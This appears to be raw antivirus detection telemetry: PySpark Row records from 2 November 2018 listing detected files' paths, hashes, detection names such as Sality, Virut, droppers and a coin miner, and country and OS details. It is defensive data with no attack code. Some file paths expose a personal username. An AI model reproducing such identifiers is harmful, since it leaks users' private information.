  Row(detection=Row(filename='avscan-20181102-202746-8d07dc5f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e39cb12a\\AVSCAN-20181102-152842-30860B0F\\AVSCAN-20181102-202746-8D07DC5F', filesize=4000, name='W32/Chir.B.#M1.#R1'), hash='689a13e778fa01e4497a428f86d9a457088d800a14b376658349cc0961140245', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:27:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3c3f20999efcb82259fe2ae42213e3c914e84535b917f10d7e622058896808c5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3C3F20999EFCB82259FE2AE42213E3C914E84535B917F10D7E622058896808C5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3c3f20999efcb82259fe2ae42213e3c914e84535b917f10d7e622058896808c5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:45:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6be026ee27f269917b7307db9f47e38c3dfb5a07ba6d4351cde088fc07fe6db1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6BE026EE27F269917B7307DB9F47E38C3DFB5A07BA6D4351CDE088FC07FE6DB1', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6be026ee27f269917b7307db9f47e38c3dfb5a07ba6d4351cde088fc07fe6db1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:21:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ae-ef03-e-psp2$项目进度计划(软件修订记录).xls', filepath='C:\\Users\\X\\Desktop\\AE-EF03-E-PSP2$项目进度计划(软件修订记录).xls', filesize=128000, name='X2000M/Agent.6489234.#M1.#R1'), hash='1899d4d9c91fcb27d40e5323532cda1136d9eb1526a5e0591d4ba733d9f3b624', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T06:29:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='capafe.exe', filepath='\\\\?\\D:\\programs\\canon 810\\English\\WIN9X\\CAPAFE.EXE', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='11c4ac9fa64798ac1b1443e5459a7111d68ea23e7906bc08601b3e98868e5e76', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:03:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='js.scr', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\FusionCharts\\ui\\js\\js.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:35:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vfeedingfrenzytwo.exe', filepath='q:\\kabo.aya\\الريشة\\سمكة 2\\vFeedingFrenzyTwo.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='445bdd527f19a6cc448b129cc121806c3f32ed1079b2823ee407b4088dcb36dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:57:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Program Files\\KMSpico\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T17:19:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T12:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T06:41:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wheelcolors.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\WheelColors\\WheelColors.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='chips.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\sxx\\Chips\\Chips.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered fodar', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fodar', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='35d68f729ac3beb6920e8a8f9bd7a7ee7fb5ef5ac1761d2d1f86d580d9c4e9e0', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ngen.exe', filepath='E:\\金蝶K3\\K3_WISE_V14.3资源盘\\K3_Wise_V14.3_Resource\\OS_CHT\\DOTNETFX35\\sxs\\x86_netfx-ngen_exe_b03f5f7f11d50a3a_6.2.9200.16384_none_82bd772bfa7bef58\\ngen.exe', filesize=168000, name='W32/Sality.AT.#M1.#R1'), hash='281652158bc60b8e93ac26fe9832d82ee499dd70ce279cc27205dfa6224566c6', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T15:53:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061902-2979c086', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061902-2979C086', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050241-7eedd44b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050241-7EEDD44B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131351-3337c972', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4ca86332\\AVSCAN-20181102-131118-1FB9A0FB\\AVSCAN-20181102-131351-3337C972', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:13:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msiexec64.vir', filepath='C:\\Users\\X\\AppData\\Local\\Canon Network Tool\\msIExEc64.VIR', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline='-r', country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Free 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T06:34:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120515-129c104d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120515-129C104D', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_default.pif:kxhmwh', filepath='E:\\alte Sicherungen allgemein 27.08.2011\\alteSachen\\altercomp\\WINDOWS\\_default.pif:kxhmwh', filesize=64000, name='TR/Lefeat.DLL1.#M1.#R1'), hash='59343af4d3ecb22854546c8e8a8f1c266a4a2a20abfb2a94e423426cfc765d91', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T12:29:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054218-083b4833', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054218-083B4833', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055228-73b21f9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055228-73B21F9F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pictures.exe', filepath='C:\\Users\\X\\Pictures\\Sample Pictures\\Pictures.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:46:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='set_homepage.exe.vir', filepath='\\\\?\\C:\\Windows\\System32\\oobe\\OEM\\Set_Homepage.exe.VIR', filesize=768000, name='HEUR/APC.#M1.#R1'), hash='493fb9580aac7ec665b8c3ba103c757a206508bb855a74ae0ae8a3eea326df4e', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:44:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00000962', filepath='C:\\Windows\\Temp\\tmp00000098\\tmp00000962', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T19:45:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053123-81b23f03', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053123-81B23F03', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053946-ad8208df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053946-AD8208DF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wsbcff6641-cea1-4517-8e9f-308cf3da2307.html', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Common Files\\Adobe\\Help\\he_IL\\Bridge\\2.0\\WSBCFF6641-CEA1-4517-8E9F-308CF3DA2307.html', filesize=4000, name='W32/Chir.B.#M1.#R1'), hash='709f3d067ed384877356cf70e10b3a1ffa07039ddf7c14b08c170b0840cb7341', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:02:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054744-ca754a2a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054744-CA754A2A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054252-1c2bb722', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054252-1C2BB722', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=13824000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='5363f4e3628dc59d172edfe595fd44efdfda77758109b6a4719b30de0202f3cd', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T17:12:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='政协桥目录.xls', filepath='F:\\参考\\工程参考\\0-莆田招投标发布图纸\\政协桥施工图图纸\\3桥\\政协桥目录.xls', filesize=128000, name='HEUR/Mailcab.C.#M1.#R1'), hash='4ed1b248de01c8456d223f7c02d498a2e0cf8970abf73e7ce014667f0f5c1c87', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:55:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jwvueblt.exe', filepath='F:\\RECYCLER\\S-1-5-12-2772410451-1313380861-030382565-1358\\JwVuEblt.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='48865df4239b115f603b0ee3344dc0f61cebbd06250cd75c0e79bd11456bb0f5', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\UsbFix\\UsbFix.exe', parentsize=1999504, timestamp='2018-11-02T16:03:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053257-b95d2c4e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053257-B95D2C4E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-121657-358b2b3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-121657-358B2B3B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.668\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.668\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T01:31:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061831-173e01e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061831-173E01E8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:30Z'), dt=datetime.date(2018, 11, 2)),
